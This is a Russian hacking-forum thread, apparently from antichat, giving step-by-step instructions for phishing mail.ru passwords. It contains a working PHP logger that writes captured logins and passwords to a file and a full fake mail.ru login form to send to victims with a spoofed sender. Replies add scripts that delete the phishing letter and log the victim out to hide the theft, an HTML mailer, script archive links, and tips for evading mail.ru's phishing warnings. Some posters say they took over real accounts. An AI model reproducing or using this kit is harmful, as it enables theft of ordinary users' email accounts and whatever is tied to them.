[::.INTRO.::]

Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.
Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ;)", сами поймете.
Статья сгодится для новичков. Гуру просьба не читать.

[::.PREPARATION.::]

Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.
Можно зарегистрироваться на любом из этих:
*только заранее убедитесь что хостинг поддерживает PHP
km.ru
nextmail.ru
hobby.ru
webrise.ru
lapin.ru
free.dl-hosting.ru
hostow.net
beplaced.ru
777host.ru
paltus.ru
miraclehost.ru
freebox.ru
alfaspace.net
k70.ru
hosting.promostudio.ru
chat.ru
maxhost.ru
nixup.com
e2e.ru
noka.ru
newmail.ru
boom.ru
h15.ru
hut.ru
jino-net.ru
pochta.ru
unlimhost.ru
onepage.ru
by.ru
sbn.bz
yard.ru
domainhosting.ru
orthodoxy.ru
webservis.ru
ru-web.net
activehost.ru
househost.ru
bestof.ru
addr.ru
hosting.dump.ru
pesni.ru
medbox.ru
fatal.ru
x5x.ru
hopshot.com
5gigs.com
wagoo.com
orgfree.com
awardspace.com
bobos.ca
www.host.sk
zportal.info
spaceall.de
3x.ro
sretenie.ru
dotgeek.org
sevhosting.net
o2g.net
www.jino-net.ru
www.nixup.com
newmail.ru
ho.com.ua/
wallSt.ru
hut.ru
holm.ru
e2e.ru
fatal.ru
host.sk
ut.ru
H1.ru
Hostmos.ru
Webm.ru
Rdcom.ru
narod.ru
front.ru
nm.ru
chat.ru
boom.ru
by.ru


Зарегистрировали? - идем дальше!
Что нам нужно:
Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):
<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
Рассмотрим скрипт поподробнее:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.
Сохраним в файл mes.php и зальем на хостинг. Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777
Пожалуй с хостингом - все!
Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код письма:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_body>
<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<table cellpadding=0 cellspacing=0 border=0 class=login>
<tr>
<td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</tr>
</table><font color=00;33;66 FACE="Arial" >
<h4 >Авторизация</h4>
</font>
<table cellpadding=0 cellspacing=0 border=0 class=login>
<form method="GET" action="http://адресссайта/mes.php">
<input type="hidden" name="mail" value="1">
<tr>
<td width=75>
<img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<td width=150>
<input type="text" name="Login">
</td>
<td width=75>
<select name="Domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td>
<td>
<input type="password" name="Password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>

<tr>
<td> </td>
<td>
<input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table><br><br>
Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>
Укажите в параметре action тега form - адресс вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.
[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.
Теперь остается отправить жертве письмо, желательно с подменой адресса.
Сделать это можно здесь:
http://www.svkadr.ru/vr/conf/index.php?mail=1
Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва клюнет на это, значит вам повезло).
Узнать пароли вы сможете в файлике mail.txt.

[::.END.::]

Думаю все.
А уж как подойти ко взлому решать вам.
Спасибо за внимание!
Жду ваших отзывов.
До свидания!

видел много материала по фейкам но все было както разброшено.. сдесь все собрано и пошагово разсмотрено. вобшем ГУД.)

в принципе у каждого метода есть свои плюсы и минусы (без этого просто никак)
юудь то ббрут или протроянивание или фейки
поставил + статья наиболее полная для новичка

А как же это?
http://i.piccy.kiev.ua/i2/c1/24/afa5fd6e684c59983d045defdb59.jpeg

У меня такого ни разу не повлялось!
это можно обойти изменив буквы в словах!
так дополняй скорее свою статью
:(

ерунда.. даже на ачате такихже статей куча.... ненадо было писать)
Статья не супер, но из-за таких как вы, считающих себя гуру, новые статьи редко пишутся! Людям просто не хочется писать статьи во избежании такой тупой критики... Что это за аргумент? -ерунда, говно и т.д. Напиши свой способ.
Сам сталкивался с такой штукой, пишешь статью, а ее удаляют. Причиной назвали сложность осуществления предложенного метода... Я чуть под стол не упал...
Я считаю не нужно отбивать у людей желание писать, хоть что то...

Моё мнение:
Не сложно,просто.
Но таких тем действительно было оч много.
Это называеться фейк и автор ничё про это не сказал.
Но и в тоже время от этого фейка мало что будет поскольку я чёто запутолся тем что будет отпровляться пись,а тама будет запрос авторизации. и тутже тама будет висеть табличка от администрации.

Предложите что-нибудь лучше, кроме брута и протроянивания.
XSS или XSS + ФЕЙК ...

ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...

ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...
А я соглашусь с ufoPlast, все он правильно сказал.

ИМХО, СИ легче юзать на Яндексе.
Поясню:
- Отсутствуют какие-либо предупреждения по поводу того что пароль можно украсть
- Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд

Вообщем мну предпочитает яндекс. :)
Хотя мэйл тоже слабо защищен...

Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд
а что мешает "анонимно" послать мыло от admin@yandex.ru ?

Тема немного старовата, но я вставлю свои 5 копеек :)
1)Зачем передовать всё через GET это палевно, меняем на POST и всё.
2)Зачем перенаправлять юзера на непонятное письмо http://win.mail.ru/cgi-bin/readmsg?id=121112312 если мы можем посмотреть refer и отправить его обратно на наше письмо, но ябы селал подругому...

Из рефера получаем ID письма (буду помечать его как messid), в фрейме грузим
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid
это перенесёт письмо в корзину, потом вызываем
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid&confirm=on
Это спросит хотимли мы удалить навсегда письмо?
Дальше вот такая форма
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250" />
<title>x3k</title>
</head>
<body onload="pe4enkiiiii.submit()">
<form action="http://win.mail.ru/cgi-bin/movemsg" method="POST" name="pe4enkiiiii">
<input type="hidden" name="confirm" value="on">
<input type="hidden" name="remove" value="1">
<input type="hidden" name="id" value="messid">
</form>
</body>
</html>
Это сносит письмо насмерть :D
Дальше в фрейме вызываем http://win.mail.ru/cgi-bin/logout это выход с ящика, потом перенаправляем юзера на http://win.mail.ru/cgi-bin/login
Всё, юзверь думает ошибся пассом, заходит, письма нет, ну и *** с ним :)

Не тестировал, токо частично, должно работать... :)
Протестировал, работает :D
=============
ОУ! Даже знаете чо делаем... После того как юзверь прищёл к нам на скрипт делаем 2 фрейма, первый 100% http://win.mail.ru/cgi-bin/msglist второй 0% где и будут происходить наши действия, этож ваще безпалевно :D

молодец, уделил время, написал. ну, что - + вообщем

Немного доработал скрипт, качать отсюда: http://slil.ru/26028341 (пасс antichat) эту не качай, качай на 2 поста ниже, там 2 версия :)

В скрипте 5 файлов
index.php - скрипт, записывающий инфу в логи
frame.php - скрипт, удаляющий письмо
log.txt - подробный лог
minilog.txt - пишется мыло и пасс
readme.html - инструкция с HTML кодом который надо отсылать

В общем заливаем скрипты куда-то, читаем readme редактируем HTML код под себя (для нубов: Чтоб отправить HTML в письме через mail.ru, нмакаем "Написать письмо" там жмакаем "Расширенный формат" вставляем HTML, отправляем) тама отредактировать 1 строку надо - ссылку на сниффер :)

Чел открывает письмо, тама месага типо скриптое письмо, введите логин и пасс, форма очень очень поломаная, но не я её писал, вопросы к ТСу :D
Так вот, чел пишет логин пасс, нажимает вход, логин и пасс идёт нам на скрипт, скрипт записывает логи и пасс в лог, при этом грузятся 2 фрейма, 1 фрейм взод на mail.ru, 2 фрейм получает от скрипта номер письма и 4 раза пытается его удалить (достаточно 2 но бывают лаги) после того как скрипт провёл свои грязные дела он перекидывает пользователя на почту, в которой от письма не осталось и следа и логи и пароль остались у нас, круто, да? :cool:
:D
P.S> Впервые этим занимаюсь и просто от нечего делать :)
=========
Гы гы, чел в аське повёлся :D Мля, а это работает оказывается :)))
Кстате в .htaccess пропишите
<files "log.txt">
order allow,deny
deny from all
</files>
<files "minilog.txt">
order allow,deny
deny from all
</files>
Ато не кайф если логи прочитают

понч впринципе неплохо- маленькое дополнение- можно там еще прикрутить снифер- да куки мы неполучим-Но мы точно будем знать открыл ли пользователь наше письмо или он еще в свой ящик незаходил, кстати пользовался- когда снифер от GreenBear был живой и точно знал айпишку- открывшего письмо и забила ли жертва хрен на наш суперфейк))) и стоит ли от нее ждать пассов)))

Сделал, http://slil.ru/26028567 пасс antichat
Это так сказать версия 2.0 но как это называется я хз :) Сами придумайе название :)
+При открытии письма мы узнаем об этом
+В инструкцию добавлен javascript, чтоб дого не копаться
+Добавлен .htaccess чтоб сами не разбирались что там и куда
=====================
Я кстати с год назад придумал и отписал тута новый способ прикола над форумчанами, там вот он и на mail.ru покатит, отсылаем письмо

<h1>Ты грязный овце*б :D </h1>
<img src="http://win.mail.ru/cgi-bin/logout">

Такое западло :) Но можно будет удалить письмо из списка :(

Пару слов скажу.
1. если картитки отключены, то не работает HTTP_REFERER, соответственно письмо не удаляется.
2. Может я чего не понял, но временно открывается новое окно http://fake.ru/index.php, а его ни как нельзя сделать размерами 0х0 ?

Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.

Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.

Дело в том что твой код отправляется как txt
Не морочь себе голову и используй скрипт(отправил в личку)

Дело в том что твой код отправляется как txt
Не морочь себе голову и используй скрипт(отправил в личку)

за старания держи +1 конечно, но написал боле интереснее функцию


function send_mail($To, $From, $Text, $Subject){
$message = "";

$Text = str_replace("\n", '<Br/>', $Text);
$headers = "From: ".$From."\n";
$headers .= "X-Mailer: PHP4\n";
$headers .= "X-Priority: 3\n";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-Type: multipart/alternative; boundary=\"==MIME_BOUNDRY_alt_main_message\"\n\n";
$message .= "--==MIME_BOUNDRY_alt_main_message\n";
$message .= "Content-Type: text/plain; charset=windows-1251\n";
$message .= "Content-Transfer-Encoding: 7bit\n\n";
$message .= $Text . "\n\n";
$message .= "--==MIME_BOUNDRY_alt_main_message\n";
$message .= "Content-Type: text/html; charset=windows-1251\n";
$message .= "Content-Transfer-Encoding: 7bit\n\n";
$message .= "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n";
$message .= "<HTML><BODY>\n";
$message .= $Text . "\n";
$message .= "</BODY></HTML>\n\n";
$message .= "--==MIME_BOUNDRY_alt_main_message--\n";
return mail($To, $Subject, $message, $headers);
}

Я отправляю из отбук экспресс и нет почему-то хтмл кода, тока тхт, помогите, вот код который я пытаюсь отправить:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_body>
<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<table cellpadding=0 cellspacing=0 border=0 class=login>
<tr>
<td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</tr>
</table><font color=00;33;66 FACE="Arial" >
<h4 >Авторизация</h4>
</font>
<table cellpadding=0 cellspacing=0 border=0 class=login>
<form method="POST" action="http://mail-m.freehostia.com/index.php">
<tr>
<td width=75>
<img src="http://mail-m.freehostia.com/readsniffer.png" height=1><img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<td width=150>
<input type="text" name="login">
</td>
<td width=75>
<select name="domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td>
<td>
<input type="password" name="password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>

<tr>
<td> </td>
<td>
<input type=checkbox value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table><br><br>
Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>

ссылка для анонимной отправки почты не работает, подскажите как их отправлять анонимно, со вставкой html кода (желательно скрипт)

и если мона то опишите как отправить уже обработанною

Alekzzzander держи скрипт http://webfile.ru/2230234

можете кто нить скрипты выложить(которые на хостинг надо заливать?

можете кто нить скрипты выложить(которые на хостинг надо заливать?
_http://webfile.ru/2351393
там четыре фейка, майл.ру, яндекс, юкоз и рамблер ;)

Сделал, http://slil.ru/26028567 пасс antichat
Это так сказать версия 2.0 но как это называется я хз :) Сами придумайе название :)
+При открытии письма мы узнаем об этом
+В инструкцию добавлен javascript, чтоб дого не копаться
+Добавлен .htaccess чтоб сами не разбирались что там и куда


Перевыложи пожалуйста архив со скриптами, очень надо!

Да, перезалейте плиз. И подскажите хостинг платный, но не очень дорогой для этих целей.

http://slil.ru/26316711

Ponchik Респект за архив +1! подскажи плиз как теперь отправить письмо в HTML формате, юзаю TheBat но там помоему нет такой функции!?

Ponchik Респект за архив +1! подскажи плиз как теперь отправить письмо в HTML формате, юзаю TheBat но там помоему нет такой функции!?
расширенный режим при отправке прямо с мэйл-ру
а вот скрипт кто бы подсказал, где можно в хтмл отправлять еще и адрес подменять, а то я уже кучу испробовал, не доходит до адресата

насчет скрипта тут гдето в этой теме видел, но адрес он там не подменяет.

Я Crazy mail юзаю

дай ссылку где дернуть его мона, желательно с мануалом!

Вот крейзи мейл , но сейчас помойму их бесплатный серв если и работает то редко.
_http://depositfiles.com/ru/files/3394597

расширенный режим при отправке прямо с мэйл-ру
а вот скрипт кто бы подсказал, где можно в хтмл отправлять еще и адрес подменять, а то я уже кучу испробовал, не доходит до адресата
iron-viper выложил рабочую функцию, вот залей этот скрипт http://slil.ru/26319681 на хост и тыкай кнопки в форме...

Я пробовал высылать форму выложенную ТС, одна проблема кнопка submit не отображается в письме, вместо нее обычное поле для ввода, то же самое на рамблере и яндексе, как решить эту проблему кто знает?

iron-viper выложил рабочую функцию, вот залей этот скрипт http://slil.ru/26319681 на хост и тыкай кнопки в форме...

Я пробовал высылать форму выложенную ТС, одна проблема кнопка submit не отображается в письме, вместо нее обычное поле для ввода, то же самое на рамблере и яндексе, как решить эту проблему кто знает?
перезайлете куданить например на дамп а то оттуда некачает.

перезайлете куданить например на дамп а то оттуда некачает.
раз http://webfile.ru/2379569
дваз http://www.mediafire.com/?yenwmttnmty

а нету у кого нить для отправки писем в html ? а то тот скрипт что в посте выше отправляет в txt.

o_0 как это? скрипт 100% рабочий, мб ты что-то неправильно делаешь, пиши что и как.

o_0 как это? скрипт 100% рабочий, мб ты что-то неправильно делаешь, пиши что и как.
Залил я скрипт на хост ( freehostia.net ) , зашол по урлу заполнил необходимые поля и поле где надо ввести текст сообшения ввел немного переделаный мной варант чака , отправил на ukr.net и мне пришло письмо не в хтмл а обычном текством варианте :)
И что тут может быть неправильно то?)

ммм) шайтанама) у хруста тоже работает и у меня работает)
мб ты в своем письме добавил <html><head><body>?

нет ничего такого недобовлял :(

скрипт работает опробовать можно тут
http://goob.coolpage.biz/mail.php
тут лежит исходник качать при помощи менеджера закачек
http://goob.coolpage.biz/mail.rar

отправил себе на почту но нефига непришло! :(
В чем может быть дело?

мммм... чак зачот. Статейка на 10 баллов :) Жаль репу ставить немогу)

отправил себе на почту но нефига непришло! :(
В чем может быть дело?
используй это
http://forum.antichat.ru/showpost.php?p=938825&postcount=48
кажется тот скрипт что я выложил ранее работает с какими то глюками то сообщение в txt отправит то вообще не отправит )

http://goob.coolpage.biz/mail.php с этого и отправлял, нефига не пришло!!!

ну тут настоятельно рекомендую пропатчить руки... еще есть возможно сть напсиать варлоку в пм у него мой скрипт работает

http://downloadportal.ru/email.php
вот на скрипт наткнулся, хороший

http://downloadportal.ru/email.php
вот на скрипт наткнулся, хороший
Да таких много штучек, есть и прожки локально на компе отсылать...

А подскажи что это за проги, их названия или выложи куданибудь!

http://downloadportal.ru/email.php - это скрипт анонимной отправки с любого адреса,примером я напишу тебе на почту сообщение с адреса Admin@antichat.ru. На сайте он уже рабочий и просто вбивай что надо и все :)

У меня с http://downloadportal.ru/email.php простой текст приходит, но когда пытаюсь прислать html код нефига не приходит, уже и <html> <head></head> </html> добовлял нефига неприходит, вот адрес тестовый на майл ру xryst13@mail.ru пришлите код тот что сдесь и расскажите как это сделать!

']А как же это?
http://i.piccy.kiev.ua/i2/c1/24/afa5fd6e684c59983d045defdb59.jpeg

Это обходится в пару тегов...

там же написана тебе что это опасный таг, ты наверное отправил <script

Да, а как надо тогда, подскажи можно в ЛС

чё подсказывать? это уже старый способ, лучше покупай у кого нить xss и ломай мыла )))

Метод хоть и довольно примитивный, но автор молодец, конструктивно написал.

Предложите что-нибудь лучше, кроме брута и протроянивания.
Лучшее оружие вора - это ум. Я то думал тут одна СИ. СИ в нете это очень уж тяжко. В реальной жизни на аппонента можно воздействовать жестами\голосом\поведением \другими людьми\нлп. Ну крестик)

http://downloadportal.ru/email.php переделал скрипт, терь хтмл походу пашет

http://downloadportal.ru/email.php переделал скрипт, терь хтмл походу пашет
http://email.rl6.ru/
лучше поставь этот скрипт)

продам хсс)))

взломал мыло какогото админчеГа :) все его сайты которые были зареганы на мыло мои :))

У меня почему то письмо не приходит!

GTO pliz подскажи как ломанул??и чем?

У меня почему то письмо не приходит!
У меня тож...что не так?

Хм ... письмо пришло спустя 2 дня, после ввода паса и лога ниче на хост не пришло!

взломал мыло админа чата на августе)

залейте плз скрипты, ссылки все мертвые. +++)

Кто-нибудь знает, как убить javascript-окно, которое вылазит при отправке данных из формы?

перезалейте ссылки плиииз!!!!!!!!!!!!!

на каком халявном хосте можно положить пхп скрипты?

Рабочая ссылка на закачку скриптов от Ponchik'а:

mail.ru_v2.rar 4.56KB (http://slil.ru/26316711)

Архивчик-то... запаролен :mad: что делать?

У когось получилось?

Расскажите поподробнее про сниффер. Что конкретно с ним делать

Что писать вместо строк "файл куда сохранять", логин и домен (чей?) и чей пароль? Надо ли что-то менять в последеней строке "куда мы будем перенаправлять пользователя после авторизации на письме-фейке."?

<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>


Надо сломать маил.ру одной дуры

1. Регистрируемся на хостинге с поддержкой PHP -
http://google.ru/search?q=бесплатный хостинг с поддержкой php
2. Создаем файл, под названием mes.php и создаем файл mail.txt (chmod 777)
3. Вставляем в него этот код:

<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
4. Копируем через ftp-протокол на созданный хостинг эти 2 файла.
5. Отправляем жертве на электронную почту письмо, код которого распложен в первом посте данного топика.
6. Проверяем файл mail.txt

Если и сейчас не понятно - то советую взять скорее в руки учебники по экономике или что там в 10-11 классе сейчас проходят..?

Я спрашивала про другое, нужно ли что-то менять в самом коде или копировать прям так, с русскими словами "логин" "пароль". С остальным я так знаю.

Прям так копировать.
Код предназначен для записи логина и пароля с mail.ru.



fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль

это комментарии... :rolleyes:

Вопрос такой, если я отправила письмо в хтмл формате, а у меня в отправленных просто этот код, получателю придет то , что должно придти?

Вопрос такой, если я отправила письмо в хтмл формате, а у меня в отправленных просто этот код, получателю придет то , что должно придти?
Отправь таким способом на другой свой емейл и посмотри как будет выглядеть...

у меня есть мыльник на маиле спец.для СИ. если чё,пиши в личку

Вот почему не надо читать письма от незнакомых людей ! =)

Ребята, помогите пожалуйста. Желание научиться есть. Но и пара вопросов появилась.

Я сделал все так, как в первом посте, но при отсылке письма на другой ящик, письмо блокируется сообщением следующего содержания:

Внимание! Администрация mail.ru никогда не запросит у Вас ваши логин и пароль.

Как я понял вся беда в сниффере:
<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

А именно в теге <script>. Как можно обойти подобное? Посоветуйте, пожалуйста.

Разумеется в файле моем комментариев нет.

Ребята, помогите пожалуйста. Желание научиться есть. Но и пара вопросов появилась.

Я сделал все так, как в первом посте, но при отсылке письма на другой ящик, письмо блокируется сообщением следующего содержания:

Внимание! Администрация mail.ru никогда не запросит у Вас ваши логин и пароль.

Как я понял вся беда в сниффере:

А именно в теге <script>. Как можно обойти подобное? Посоветуйте, пожалуйста.

Разумеется в файле моем комментариев нет.
Не в сниффере, а в письме которое посылаешь. Скрипт майла реагирует так на слово пароль.

Хм, и как тогда обойти сие?

если правда реагирует на силово пароль то попробуй написать слово пароль так: пa(латинская)роль

не прокатило =( вероятно все дело в самих командах.

не прокатило =( вероятно все дело в самих командах.
все дело в редиректе, у тебя указывет что ссылка ведет на внешний сайт(в твоем случае фейк), а надо так ссылка на майл- редирект на фейк (каждый использует лично свои редиректы и выкладывать их здесь наврядли будут- т к майл быстро все это дело фиксет)

не прокатило =( вероятно все дело в самих командах.
И это всё? сдался? Может кто-нибудь попробует подумать?
Убери слово пароль наxyй из письма и посмотри результат. Предупреждение пропало? Отлично! думаем дальше, как бы нам всё же оставить это слово и чтоб малрушный скрипт не сдавал нас с потрохами. И не надо больше преждевременных неправильных выводов.

И это всё? сдался? Может кто-нибудь попробует подумать?
Убери слово пароль наxyй из письма и посмотри результат. Предупреждение пропало? Отлично! думаем дальше, как бы нам всё же оставить это слово и чтоб малрушный скрипт не сдавал нас с потрохами. И не надо больше преждевременных неправильных выводов.

Месяц посвятил этому. Слово "пароль" убрал. Не помогло.

Babkin скинь в PM письмо которое посылаешь.

перезалейте архив плз!!!
для отправки письма с подменой адреса советую bogomol.net/incom/

перезалейте архив плз!!!
для отправки письма с подменой адреса советую bogomol.net/incom/
я угораю эта статья была в 2008 пиши в ПМ челу может дает если сидит тут досихпор

Перезалейте скрипт от Ponchik'а!!!

Помнится была ещё тема с открытками. Там когда хотим посмотреть открытку переадресует на страницу с логином/паролем. Соответственно подменяем эту страницу на свою.

Кстати проверка на урл сайта куда идёт переход с формы в письме проверяется яваскриптом под телом письма и должен содержать "mail.ru". я так понимаю, если забить домен mail.ru.anydomen.ru, то прокатит и этот фейк.

Кстати следует задуматься над тем, что не обязательно вообще регить какой бы то не было хостинг, нужно реализовать отправку сообщения внутри mail.ru. Это явно поможет обойти защиту.

Только вот как это сделать я пока слабо представляю, хотя мысли есть.

хорошая статья, а прочитал только сегодня. Когда научусь делать что то лучше других - напишу статью тоже!

да,не плохо все расписано

а если у меня нету денег на платный хост?
что посоветуешь?)

найти деньги и купить)

найти деньги и купить)

на стройку)xD

другого ответа и не думал услышить.
гораздо проще по развести по аське.
(блондинок)

Статья несомненно good. Думаю должен понять, даже тот кто никогда с этим дела не имел. Все очень хорошо разжёвано и объяснено.

блиин я новичек нифига не втыкаюсь (((( лан поучусь еще на чем нибудь другом потом приду ставлю + надеюсь в будущем поможет мне )

Скинте линк откуда скачать можно, а то все битые;(